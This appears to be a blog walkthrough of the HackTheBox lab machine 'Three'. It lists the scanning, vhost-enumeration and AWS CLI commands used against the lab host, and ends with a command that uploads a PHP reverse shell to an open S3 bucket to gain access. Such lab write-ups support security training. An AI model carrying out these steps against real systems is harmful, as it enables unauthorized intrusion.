Home Walkthrough - Three
Post
Cancel

Walkthrough - Three

Posted Aug 31, 2022 Updated Jan 10, 2023
By 0xskar
1 min read

Tags: Security, AWS, DNS, VHOST. Description: Hackthebox boot2root machine. Difficulty: Very-Easy

Task 1 How many TCP ports are open?

  • sudo nmap -Pn -sS 10.129.77.119 -p- -vvv
1
2
3

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Task 2 What is the domain of the email address provided in the “Contact” section of the website?

  • thetoppers.htb

Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?

  • /etc/hosts

Task 4 Which sub-domain is discovered during further enumeration?

Add thetopppers.htb to your /etc/hosts file. After adding we can scan for sub-somains.

Task 5 Which service is running on the discovered sub-domain?

We have a hint that the sub-domain is two characters here. I dont know of any 2 char or digit wordlists so goign to make one with crunch 1 2 0123456789abcdefghijklmnopqrstuvqxyz -o dnslist.txt. DNS with gobuster doesnt work for this list but using gobuster vhost does.

  • gobuster vhost -u thetoppers.htb -t 100 -w dnslist.txt
  • amazon s3

Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?

  • awscli

Task 7 Which command is used to set up the AWS CLI installation?

  • aws configure

Task 8 What is the command used by the above utility to list all of the S3 buckets?

  • aws s3 ls

Task 9 This server is configured to run files written in what web scripting language?

  • php

Submit root flag

With this information we can now connect to the sevrer. Configure with aws configure and use temp parameters.

We can use ls to list the s3 endpoints the server is hosting

  • aws --endpoint=http://s3.thetoppers.htb ls

Now we can list objects the specific buckets contain.

  • aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

Seeing as this bucket is available for us to visit and powered by php we can then copy a reverse shell to the server and get access.

  • aws --endpoint=http://s3.thetoppers.htb s3 cp php-reverse-shell.php s3://thetoppers.htb/images/

0xskar

This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents